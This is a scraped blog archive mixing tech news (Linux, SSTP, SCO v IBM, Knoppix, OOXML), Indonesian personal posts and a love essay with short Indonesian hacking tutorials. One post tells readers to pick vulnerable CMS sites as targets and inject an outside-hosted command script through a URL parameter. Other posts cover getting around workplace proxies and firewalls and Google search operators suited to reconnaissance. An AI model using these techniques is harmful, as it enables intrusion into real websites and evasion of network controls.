Linus Torvalds was just 21 when he changed the world. Working out of his family's apartment in Helsinki in 1991, he wrote the kernel of a new computer operating system called Linux that he posted



Bono & Bob Geldof
Paul Wolfowitz describes the odd couple of advocacy
Václav Havel
He wrote the script for peaceful revolution, says Lou Reed
Christiane Amanpour
She makes the news make a difference
Giovanni Falcone & Paolo Borsellino
They fought the Mafia and paid with their lives
Anna Politkovskaya
Her commitment to the truth killed her
other stories »




Get The Magazine
Try 4 issues FREE
Get unlimited access to the TIME Archive and free delivery to your door
Give a gift of TIME

for free on the Internet — and invited anyone interested to help improve it.

Today, 15 years later, Linux powers everything from supercomputers to mobile phones around the world, and Torvalds has achieved fame as the godfather of the open-source movement, in which software code is shared and developed in a collaborative effort rather than being kept locked up by a single owner.

Some of Torvalds' supporters portray him as a sort of anti-Bill Gates, but the significance of Linux is much bigger than merely a slap at Microsoft. Collaborating on core technologies could lead to a huge reduction in some business costs, freeing up money for more innovative investments elsewhere. Torvalds continues to keep a close eye on Linux's development and has made some money from stock options given to him as a courtesy by two companies that sell commercial applications for it.

But his success isn't just measured in dollars. There's an asteroid named after him, as well as an annual software-geek festival. Torvalds' parents were student radicals in the 1960s and his father, a communist, even spent a year studying in Moscow. But it's their son who has turned out to be the real revolutionary.

Saturday, January 20, 2007

Microsoft to Introduce VPN Tunneling Protocol

A new secure VPN tunneling protocol is cooking in the labs at Microsoft. The new form of VPN tunnel is called SSTP (Secure Socket Tunneling Protocol). Microsoft is scheduled to
introduce SSTP in Windows Vista Service Pack 1 and in Longhorn Server.

Currently, there are issues involving VPN connections in relation to PPTP GRE port blocking or L2TP ESP port blocking via a firewall or a NAT router, preventing the client to reach the server. Microsoft is laboring to deliver ubiquitous connectivity through VPN.

The Secure Socket Tunneling Protocol “will allow VPN tunnel connectivity across any scenarios i.e. behind NAT routers or firewalls or web proxies. And the best part of it - your end user remote access experience (like using RAS dialer) and network administration experience (like using RRAS server) remains same as before. i.e. SSTP based VPN tunnel just acts as a one more VPN tunnel that gets plugged into MS VPN client and VPN servers,” revealed Samir Jain, Lead Program Manager, RRAS, Windows Enterprise Networking, adding that the SSTP based VPN protocol will be made available as a beta together with Longhorn server Beta3.

Via the Secure Socket Tunneling Protocol (SSTP), the VPN tunnel will function over Secure-HTTP. In this manner, the problems with VPN connections based on the Point-to-Point Tunneling Protocol (PPTP) or Layer 2 Tunneling Protocol (L2TP) will be eliminated. Web proxies, firewalls and Network Address Translation (NAT) routers located on the path between clients and servers will no longer block VPN connections.

“The good part of SSTP is it integrates with MS RAS client/server infrastructure seamlessly. For example, SSTP supports password + strong user authentication (like smart-card, RSA securID, etc) using various PPP authentication algorithm. Other features of RAS (like generating profiles using connection manager administration kit, remote access policies, etc) - just works - similar to other PPTP/L2TP,” added Samir Jain.

Microsoft, Google Agree to NGO Code of Conduct

"Technology companies have come under fire for providing equipment or software that permits governments to censor information or monitor the online or offline activities of their citizens. For example, last year, Google's approach to the China market was criticized over its creation of a censored, local version of its search engine. Microsoft, Google, and two other technology companies will develop a code of conduct with a coalition of nongovernmental organizations (NGO) to promote freedom of expression and privacy rights, they announced Friday. The two companies along with Yahoo, and Vodafone Group said the new guidelines are the result of talks with Business for Social Responsibility (BSR) and the Berkman Center for Internet & Society at Harvard Law School."

Friday, January 19, 2007

Melangkah ke Depan

Jurnal Hidup Seorang yang Bernama Arthur

Itulah temanku yang baru membangun blognya kembali setelah ditinggalkannya blognya yang lama. Dan dengan bangganya mendeklarasikan dirinya yang sok merendah meninggikan mutu.... Loh kok jadi sewot gw ^_^ becanda thur.

Arthur pria putih kurus yang ternyata keturunan Manado-Cina-Bali ini (pura2 nya baru tau). Dengan wajahnya yang ganteng selalu didambakan wanita-wanita di sekitarnya. selain berperawakan menarik otak nya juga encer (ampe luber dan kopong, becanda lagi thur ^_^).

Udah ah males ngomongin arthur, bosen dari mata merem ampe merem lagi liatnya dia (ato emang karena gw sipit yah ;) Yah pokoknya Arthur adalah onyon, onyon adalah arthur.... apa lagi sih gw ... udah ah makin ngaco ajah gw.

Ngantuk blom tidur 2 hari, sibuk .... maen cewe ... loh kok, khan makin ngaco ajah khan. Blom tidurnya bener ... ngejar setoran coy.

Cukup sudah untuk hari ini ...... Melangkah ke depan .... tidur dulu .... zzzz...

Judge Rules That IBM Did Not Destroy Evidence

"From the latest in the SCO saga, Judge Wells ruled today that IBM did not destroy evidence as SCO claims. During discovery, SCO claims it found an IBM executive memo that ordered its programmers to delete source code, and so it filed a motion to prevent IBM from destroying more evidence. The actuality of the memo was less nefarious. An IBM executive wanted to ensure that the Linux developers were sandboxed from AIX/Dynix. So he ordered them to remove local copies of any AIX code from their workstations so that there would not be a hint of taint. The source code still existed in CVMC and was not touched. Since the source code was still in CMVC, Judge Wells ruled IBM did not destroy it. Incredulously, SCO's Mark James requested that IBM tell SCO how to obtain the information. IBM's Todd Shaughnessy responded that all during discovery (when IBM gave SCO a server with their CMVC database) SCO never once said that they were unable to find that information from CMVC. Judge Wells asked IBM to help SCO out in any way he could."

The Human Brain Must Forget the Mother Tongue When Learning a New Language














The process is named "first language attrition"
By: Stefan Anitei, Science Editor

After one year of scholarship in Spain, you surely master the language of the conquistadors like none around you, but why is everybody picking on you, saying you are boasting (believe me, I personally experienced something like this). In fact, people will be in the situation to find it hard to return to their native language.This phenomenon is named “first-language attrition” and puzzled researchers for a long time: how was it possible to forget, even momentarily, words you have used fluently all your life.

Psychologist Benjamin Levy and Dr. Michael Anderson at University of Oregon found that this forgetting is not a passive fact, due to the simple disuse of the mother tongue language,


but an active process inflicted by the brain itself that impedes us using words of the native language, which would make learning and speaking the new language harder. This forgetfulness is - in fact - an active adaptive strategy to better “catch” the second language.

The researchers used native English speakers who had made at least one year of college level Spanish to answer repeatedly the name of various objects in Spanish.

The more the students were using the Spanish words, the harder they found it to encounter the corresponding English labels for the objects.

In fact, using the foreign language inhibits the corresponding labels in the native language, and appears as “first language attrition”. Nevertheless, the more fluent bilingual students were, far less prone to experience the attrition they were. Thus, “first language attrition” is a key factor during the initial stages of second language learning.

When we begin to learn a new language, our brain starts to actively inhibit our easily accessible native language words while trying to imprint in our mind a new idiom.

When bilingualism advances, the attrition turns less necessary, so the subjects in the study were better in shifting between the two languages.

It may look paradoxical, but "first-language attrition provides a striking example of how it can be adaptive to (at least temporarily) forget things one has learned."

Knoppix 5.1.1: Now with eye candy

The new year has brought a new release of the Knoppix live CD. Along with the usual updates to application software, the most noticeable change in version 5.1.1 is the inclusion of the Beryl 3-D desktop with the Emerald theming engine.


Since support for Beryl is still experimental, the 3-D desktop is provided in Knoppix as an option. To enable it, you have to use the knoppix desktop=beryl cheat code on boot. Considering the current status of Beryl, the new 3-D desktop works surprisingly well; it starts without any problems on a lowly Acer TravelMate 243 laptop with an Intel 82855 GM integrated graphics controller, and it feels snappy and is a joy to use. While some may consider the inclusion of Beryl in Knoppix a gimmick, it provides a great introduction to the whole 3-D desktop idea. Installing Beryl can be a tricky and time-consuming business, so the ability to try the fancy 3-D desktop with zero effort is a boon for all users looking for some Linux eye candy.

As usual, most software packages have also been updated. Knoppix 5.1.1 comes with KDE 3.5.5, GNOME 2.14 (available in the Knoppix DVD edition only), and OpenOffice.org 2.1. Following the recent Mozilla/Debian controversy, the Firefox browser and the Thunderbird email client have been replaced in Knoppix 5.1.1 with Iceweasel and Icedove respectively. Among useful software additions is the mkbootdev script, which allows you to create a bootable USB stick -- a handy tool for making a USB version of Knoppix. Of course, the most important software news in Knoppix 5.1.1 is without a doubt the inclusion of the latest Frozen Bubble game, which now supports multi-player network games.

small.gif
Click to enlarge
Knoppix 5.1.1 also features a number of significant changes under the hood. The UnionFS file system has been replaced with aufs (Another UnionFS). According to the changelog, aufs is a more streamlined implementation of UnionFS that fixes many bugs still found in the original file system. The latest version of Knoppix comes with the NTFS-3G driver that offers full read/write operations on NTFS partitions. This makes Knoppix an even better tool for troubleshooting Windows-based machines.

As always, the new version of Knoppix comes in CD and DVD editions, which are available for download from mirrors listed at the Knoppix Web site. All in all, this release continues the fine tradition of delivering solid updates to the already great live CD Linux distro.

Dmitri Popov is a freelance writer whose articles have appeared in Russian, British, German, and Danish computer magazines.

Thursday, January 18, 2007

Indonesia's Largest IP/MPLS Core Expands In NGN Rollout

PT Telkom Commits to M-Series Multiservice Platform for Advanced IP Services.

Siemens and Juniper Networks, Inc. today announced that PT Telkom, Indonesia’s leading telecommunications service provider, has further expanded its IP/MPLS-based core infrastructure with additional Juniper Networks M-series multiservice routing platforms including the M320. The upgrade, performed by Siemens, builds on PT Telkom’s existing M-series routers, deployed last year as part of an initial Next Generation Network (NGN) rollout. The new deployment spans 17 cities, connecting softswitch systems and legacy routers.

“After more than a year of intensive use, our earlier M-series deployment has demonstrated the superiority and flexibility of Juniper’s JUNOS Operating System,” said Mr. Abdul Haris, PT Telkom’s Director of Network and Solutions and the service provider’s Chief Technology Officer. “We were also impressed by the routers’ traffic engineering capability, strict QoS adherence even under extremely heavy load, and Juniper’s high availability features, such as fast reroute and in-service upgrading. We are confident to stay with Juniper and its routing solutions for our long-term NGN strategy.”

The M-series multiservice routers are part of the Juniper Networks family of best-of-class routing platforms which also include the market leading E-series Broadband Services Routers and T-series next-generation core routers. Juniper Networks E-, M- and T-series routing platforms deliver industry-leading levels of performance, reliability and scale to enable service providers to deliver high-quality voice, video, data and other advanced services over an IP/MPLS network with assured levels of performance and security. The T-series is the industry's most proven core routing platform and, with the multi-chassis TX Matrix technology, allows service providers to scale to multi-terabit rates without the risks associated with new and unproven technologies.

“Our M-series deployment at PT Telkom is a great example of the benefits of migrating to a next generation IP/MPLS-based infrastructure,” said Adam Judd, vice president of Asia Pacific for Juniper Networks. “Asia Pacific’s need for capacity to deliver advanced services – including VoIP, realtime video, broadband access, and VPN services – continues to grow, and service providers such as PT Telkom are leveraging Juniper’s industry leading platforms to address this demand and capture new revenue opportunities.”

The Contradictory Nature of OOXML

"the Microsoft Office XML-based format specification, OOXML, is now in the adoption queue at ISO/IEC. That process takes six months, and has two steps. During the first one-month step, any member may submit 'contradictions,' which means aspects in which a proposed standard conflicts with already adopted ISO/IEC standards and Directives. Those contradictions must then be 'resolved' (which does not necessarily mean eliminated), and these resolutions are then presented back to the members to consider during the five-month voting stage that follows. A month isn't very long to do a line-by-line analysis of a 6,000-page spec, but experts in the national standards bodies around the world are doing just that. What they are finding includes the use of proprietary, hard-wired elements rather than incorporation of available ISO/IEC standards; additional Microsoft technology that must be emulated (but is not covered by the Microsoft patent pledge); elements that can't be implemented without Microsoft technical assistance; dependencies on Windows itself; mandatory bugs; and more. And then there's also the fact that OOXML heavily overlaps ODF — a platform-independent, already-adopted ISO/IEC. It promises to be an interesting battle." And an anonymous reader adds word of the release, after 10 months of development, of Docvert 3.0, an open-source web service that converts DOC files to Oasis OpenDocument 1.0 (download the source here).

Monday, March 20, 2006

LOVE ISN'T BLIND

" When two people love each other, nothing is more
imperative and
delightful than giving. " - Guy de Maupassant -

Cinta berpijak pada perasaan sekaligus akal sehat.
Miskonsepsi pertama
yang ditentang Bowman adalah manusia jatuh cinta
dengan menggunakan
perasaan belaka. Betul, kita jatuh cinta dengan
hati. Tapi agar tidak
menimbulkan kekacauan di kemudian hari, kita
diharapkan untuk juga
menggunakan akal sehat.

Bohong besar kalau kita bisa jatuh cinta dengan
begitu saja tanpa bisa
mengelak. Yang sesungguhnya terjadi, proses jatuh
cinta dipengaruhi
tradisi, kebiasaan, standar, gagasan, dan deal
kelompok dari mana kita
berasal.

Bohong besar pula kalau kita merasa boleh berbuat
apa saja saat jatuh
cinta, dan tidak bisa dimintai pertanggungjawaban
bila
perbuatan-perbuatan impulsif itu berakibat buruk
suatu ketika nanti.

Kehilangan perspektif bukanlah pertanda kita jatuh
cinta, melainkan
sinyal kebodohan. Cinta membutuhkan proses, Bowman
juga menolak anggapan
cinta bisa berasal dari pandangan pertama. "Cinta
itu tumbuh dan
berkembang dan merupakan emosi yang kompleks,"
katanya.

Untuk tumbuh dan berkembang, cinta membutuhkan
waktu. Jadi memang tidak
mungkin kita mencintai seseorang yang tidak
ketahuan asal-usulnya
dengan begitu saja.

Cinta tidak pernah menyerang tiba-tiba, tidak juga
jatuh dari langit.
Cinta datang hanya ketika dua individu telah
berhasil melakukan
orientasi ulang terhadap hidup dan memutuskan
untuk memilih orang lain
sebagai titik fokus baru. Yang mungkin terjadi
dalam fenomena "cinta
pada pandangan pertama" adalah pasangan terserang
perasaan saling
tertarik yang sangat kuat bahkan sampai
tergila-gila. Kemudian perasaan
kompulsif itu berkembang jadi cinta tanpa menempuh
masa jeda. Dalam
kasus "cinta pada pandangan pertama", banyak
orang tidak benar-benar
mencintai pasangannya, melainkan jatuh cinta pada
konsep cinta itu
sendiri. Sebaliknya dengan orang yang benar-benar
mencinta, mereka
mencintai pasangan sebagai persolinatas yang utuh.

Cinta tidak menguasai dan mengalah, tapi berbagi.
Bukan cinta namanya
bila kita berkehendak mengontrol pasangan. Juga
bukan cinta bila kita
bersedia mengalah demi kepuasan kekasih. Orang
yang mencinta tidak
menganggap kekasih sebagai atasan atau bawahan,
tapi sebagai pasangan
untuk berbagi, juga untuk mengidentifikasi diri.
Bila kita berkeinginan
menguasai kekasih (membatasi pergaulannya,
melarangnya beraktivitas
positif, mengatur seleranya berbusana, selalu
mengkritik semua
kekurangannya) atau melulu mengalah (tidak protes
bila kekasih berbuat
buruk, tidak keberatan dinomorsekiankan), berarti
kita belum siap
memberi dan menerima cinta.

Cinta itu konstruktif.
Individu yang mencinta berbuat sebaik-baiknya demi
kepentingan sendiri
sekaligus demi (kebanggaan) pasangan. Dia berani
berambisi, bermimpi
konstruktif, dan merencanakan masa depan.
Sebaliknya dengan yang jatuh
cinta impulsif. Bukannya berpikir dan bertindak
konstruktif, dia
kehilangan ambisi, nafsu makan, dan minat terhadap
masalah sehari-hari.
Yang dipikirkan hanya kesengsaraan pribadi.
Impiannya pun tak mungkin
tercapai. Bahkan impian itu bisa menjadi subsitusi
kenyataan.

Cinta terhitung sehat bila saat dekat dan jauh
dari pasangan, kita
menyukainya dalam kadar sebanding.

Cinta tidak bertumpu pada daya tarik fisik
Dalam hubungan cinta, daya tarik fisik memang
penting. Tapi bahaya bila
kita menyukai kekasih hanya sebatas fisik dan
membencinya untuk banyak
faktor lainnya. Saat jatuh cinta, kita menikmati
dan memberi makna
penting bagi setiap kontak fisik. Kontak fisik,
ketahuilah, hanya terasa
menyenangkan bila kita dan pasangan saling
menyukai personalitas
masing-masing. Maka bukan cinta namanya, melainkan
nafsu, bila kita
menganggap kontak fisik hanya memberi sensasi
menyenangkan tanpa makna
apa-apa. Dalam cinta, afeksi terwujud belakangan
saat hubungan kian
dalam. Sedang nafsu menuntut pemuasan fisik sedari
permulaan.

Cinta tidak buta, tapi menerima
Cinta itu buta? Tidak sama sekali. Orang yang
mencinta melihat dan
menyadari sisi buruk kekasih. Karena besarnya
cinta, dia berusaha
menerima dan mentolerir. Tentu ada keinginan agar
sisi buruk itu
membaik. Namun keinginan itu haruslah didasari
perhatian dan maksud
baik. Tidak boleh ada kritik kasar, penolakan,
kegeraman, atau rasa
jijik. Nafsulah yang buta. Meski pasangan sangat
buruk, orang yang
menjalin hubungan dengan penuh nafsu menerima
tanpa keinginan
memperbaiki. Juga meninggalkan pasangan saat
keinginannya terpuaskan,
hanya karena pasangan punya secuil keburukan yang
sangat mungkin
diperbaiki.

Cinta memperhatikan kelanjutan hubungan
Orang yang benar-benar mencinta memperhatikan
perkembangan hubungan
dengan kekasih. Dia menghindari segala hal yang
mungkin merusak
hubungan. Sebisa mungkin dia melakukan tindakan
yang bisa memperkuat,
mempertahankan, dan memajukan hubungan. Orang yang
sedang tergila-gila
mungkin saja berusaha keras menyenangkan kekasih.
Namun usaha itu
semata-mata dilakukan agar kekasih menerimanya,
sehingga tercapailah
kepuasan yang diincar. Orang yang mencinta
menyenangkan pasangan untuk
memperkuat hubungan.

Cinta berani melakukan hal menyakitkan
Selain berusaha menyenangkan kekasih, orang yang
sungguh-sungguh
mencinta memiliki perhatian, keprihatinan,
pengertian, dan keberanian
untuk melakukan hal yang tidak disukai kekasih
demi kebaikan. Seperti
seorang ibu yang berkata "tidak" saat anaknya
meminta es krim, padahal
sedang flu.

Begitulah kita semua seharusnya bersikap pada
pasangan....

Friday, March 03, 2006

Php Bugs

Pada awalnya saya menulis PhpInjection hanya untuk pengetahuan sekilas saja.Tapi tampaknya masih banyak orang yang bertanya dan tampaknya makin hari makin banyak bugs yang ditemukan. Hal ini juga dikarenakan makin banyak orang menggunakan dan mengandalkan CMS (Content management system)sebagai langkah cepat dalam membuat suatu website. Memang CMS ini membuat proses pembuatan website menjadi sangat cepat, tapi tanpa disadari hal ini membuat ada nya persamaan antara website yang satu dan yang laen.

Nah klo ada yang sama, karena dibangun diatas script yang sama maka bugs nya pun sama. Berikut ini saya akan lampirkan list bugs yang saya dapat.Buat target.

Lihat aja disini

Nah dari list yang didapat tadi maka kamu bisa memulai pencarian kamu. Setelah dapat target maka kmu ganti dech :

http://www.injection.com/cmd? menjadi http://geocities.com/k4k3_rgb/test?&cmd

Nah jadi dech dan liat hasilnya. Kalo ndak bisa berarti sudah di patch so langsung dech cari yang laen.

Friday, February 24, 2006

Mengakali Proxy Server

Nah pada suatu hari ada teman bertanya : "Mas aku kok tidak bisa buka friendster yach di kantor ku, kayaknya di blog dech di server nya ....". Kenapa hal ini bisa terjadi?Karena Proxy server dan rules pada firewall di Gateway nya.
Nah sebelum itu saya akan memberikan sedikit gambaran tentang proxy server dan Firewall Gateway.

Proxy server;
Apa itu Proxy server?Mari kita tanyakan 'Tante Wiki terlebih dulu...'
"A proxy server is a computer that offers a computer network service to allow clients to make indirect network connections to other network services. A client connects to the proxy server, then requests a connection, file, or other resource available on a different server. The proxy provides the resource either by connecting to the specified server or by serving it from a cache. In some cases, the proxy may alter the client's request or the server's response for various purposes.
A proxy server can also serve as a firewall."

Secara singkatnya adalah server atau mesin untuk mengatur lalu lintas data dalam jaringan dan digunakan untuk menyimpan halaman web yang pernah dikunjungi dalam cache nya untuk memanage penggunaan bandwidth.Sebagai gambaran adalah alamat URL yang sudah pernah dikunjungi akan tersimpan di cache dan semua pemanggilan terhadap URL tertentu akan diarahkan pada simpanan di cache atau di tetapkan rules tertentu.Nah terkadang pada suatu instansi tertentu ditetapkan rules tertentu untuk membatasi penggunaan oleh user, yah contohnya kantor yang tidak dapat membuka www.friendster.com pada saat jam kantor, atau tidak dapat dibukanya website dengan content Pornografi dan kekerasan pada jaringan kampus atau pun sekolah.

Firewall;
Pada kesempatan sebelumnya saya sudah membahas mengenai hal yang satu ini, Lihat artikel Si Tembok Api.Nah yang intinya adalah sebuah sistem baik perangkat keras maupun perangkat lunak yang mengatur dan mencatat lalu lintas data yang keluar dan masuk dari dan ke jaringan lokal.

Nah karena ditetapkannya aturan pada kedua sistem kita inilah maka kita tidak dapat seenaknya menggunakan internet.Tapi jangan khawatir ternyata semua nya itu dapat kita akali.

1. Cara Pertama;
Nah sekali lagi semuanya itu ditetapkan berdasarkan suatu rules, yang dalam hal ini adalah ketentuan penggunaan lalu lintas dan port. Nah yang paling sederhana untuk membatasi pembatasan ini adalah dengan menggunakan anonymous server atau proxy server lain di luar Proxy atau gateway instansi kita.Mangapa hal ini memungkinkan?Karena yang dicatat adalah bahwa kita membuka hanya ke alamat URL dari anonymous browsing atau proxy tersebut sehingga URL mana yang kita tuju dari proxy atau anonymous browsing itu tidak akan terlihat pada proxy atau firewall kita.

Nah untuk contohnya coba ajah : www.guardster.com, www.freebrowsing.com, dll
Nah untuk list proxynya liat ajah di : http://familycode.atspace.com/irc.htm atau di http://www.samair.ru/proxy/socks.htm

2. Cara kedua;
Nah pada cara kedua ini adalah dengan melakukan 'tunneling' terhadap proxy server kita. Nah untuk yang satu ini diperlukan sedikit pengetahuan dan informasi.Nah sebelumnya saya sudah bilang bahwa semuanya hanyalah pengaturan lalu lintas dari data dan port apa yang digunakan.Nah cari taulah port berapa saja yang digunakan dan untuk apa. Nah lakukanlah tehnik scanning. Nah setelah kita tahu maka gunakanlah berbagai software yang tersedia di Internet untuk melakukan tunneling proxy. Jangan males yah banyak kok. Tanya ajah om GOOGLE keyword "proxy tunneling".
sebagai contohnya : InvisibleBrowsing, bypass Client, Proxyway, dll
Nah setting dech proxy yang digunakan, dan jika diperlukkan lakukan setting port yang digunakan.

Nah itulah cara ngakali Proxy pada kantor atau kampus kamu. Nah sebenarnya masih ada satu cara lagi dan cukup mudah. Ini adalah kelebihan dari Paman kita yang terkenal baik hati dan menyediakan pada kita segalanya.Ya itulah 'Om Google' kita.GOOGLE...bukan untuk searching tapi untuk jadi anonymous.Kok bisa?Nah kita gunakan salah satu fasilitasnya yaitu translate.

Coba Dech : http://translate.google.com/translate?u=

Nah sebenarnya ini adalah fasilitas GOOGLE untuk mentranslate isi website, tetapi jika tidak ada akan ditampilkan aslinya.Namun cara ini cukup kuno dan kalo admin nya pinter hal ini dapat di cegah.
Nah demikian dulu Saya berbagi informasinya.

Sekian lah tutor kita kali ini. Semua tindakan yang dilakukan karena membaca tutor ini. Artikel ini dibuat hanyalah semata-mata untuk pengetahuan tindakan yang dilakukan karena membaca artikel ini bukanlah tanggung jawab penulis.

Keampuhan Om Google

Setelah sekian lama tidak membuat posting baru akhirnya hari ini aku dapat melakukannya lagi. Beberapa hari lalu daku keluar kota sehingga boro2 posting, konek internet juga ndak. Nah pada kesempatan kali ini Daku ingin memberikan informasi sedikit mengenai salah satu search engine paling powerful di dunia. Mungkin sudah tidak asing lagi bagi anda menggunakannya."GOOGLE" yah itulah search engine kita. Yang memudahkan kita semua dalam mendapatkan informasi tentang apa saja di seluruh dunia dalam waktu yang singkat.Atau yang dalam panggilan akrabnya kita sering menyebut 'Om Google'.

Pada kesempatan ini saya akan memberikan sedikit tips saja untuk anda dalam menggunakan semua fasilitas google ini.
Nah langsung dech kita mulai. Untuk mengetahui fasilitas apa saja yang terdapat dalam google maka kita bisa melihat pada link :

-= http://www.google.com/intl/en/options/ =-

Itulah semua layanan yang disediakan oleh google. Nah pada posting pertama ini saya hanya akan memberikan sedikit tips dalam penggunaan Google.

1. Pertama, lakukanlah pencarian dengan detail. Dalam hal ini masukkan keyword selengkapnya sehingga pencarian dapat lebih terarah.Berikut ini saya lampirkan beberapa Google Syntax:

-. [intitle:]
Memungkinkan kita melakukan search berdasarkan title atau judul dari halam web.Google akan membatasi hasil pencarian sesuai dengan permintaan kita. Misal : "intitle:login", maka google akan menampilkan semua halaman web dengan judul atau title "login". Perlu diingat bahwa command2 tersebut hanya akan mengenali satu kata sesudahnya. Kalau kita menggunakan "intitle:login password", maka google akan menampilkan halam dengan judul atau title login dan terdapat kata password di halaman web tersebut.
Bila kita menginginkan pencarian dengan title atau judul "login password" maka kita mengetikkan "allintitle:login password".

-. [inurl:]
Memungkinkan kita melakukan pencarian pada suatu situs tertentu saja. Misal : "password inurl:www.jasakom.com", maka pencarian dengan keyword password akan dilakukan pada situs www.jasakom.com.

-. [site:]
Memungkinkan kita melakukan pencarian untuk membatasi pencarian pada site atau domain tertentu. Misal : "hacking site:co.id" akan dilakukan pencarian dengan keyword hacking pada semua site dengan domain .co.id.

-. [filetype:]
Memungkinkan kita melakukan pencarian untuk membatasi pencarian terhadapa file dengan ekstensi tertentu saja. Misal : "filetype:doc site:gov", maka akan ditampilkan semua link berisikan file dengan ekstensi .doc di domain gov.

-. [link:]
Memungkinkan pencarian untuk menampilkan halaman-halaman web yang mempunyai link ke suatu situs tertentu. Misal : "link:www.123.net", maka akan ditampilkan semua halaman situs yang mempunyai link ke www.123.net.

-. [related:]
Memungkinkan pencarian untuk menampilkan hasil-hasil yang mirip dengan web yang di spesifikasikan. Misal : "www.blackhat.com" akan menampilkan list halaman-halaman yang mirip blackhat.com.

-. [intext:]
Menampilkan hasil pencarian terhadap kata-kata tertentu, dengan mengabaikan URL serta judul dari halaman web.Misal : "intext:expoits" akan menampilkan halaman web yang ada kata-kata expoits.

-. [phonebook:]
Membantu pencarian untuk orang atau alamat.Misal : "phonebook:Anto+Bandung", maka akan ditampilkan informasi mengenai seseorang berupa alamat pada lokasi yang dicari.

Nah demikian dulu sedikit sharingnya mengenai Search Engine 'GOOGLE'.


Sumber : Buku 'Hack Attack, Konsep, Penerapan dan Pencegahan'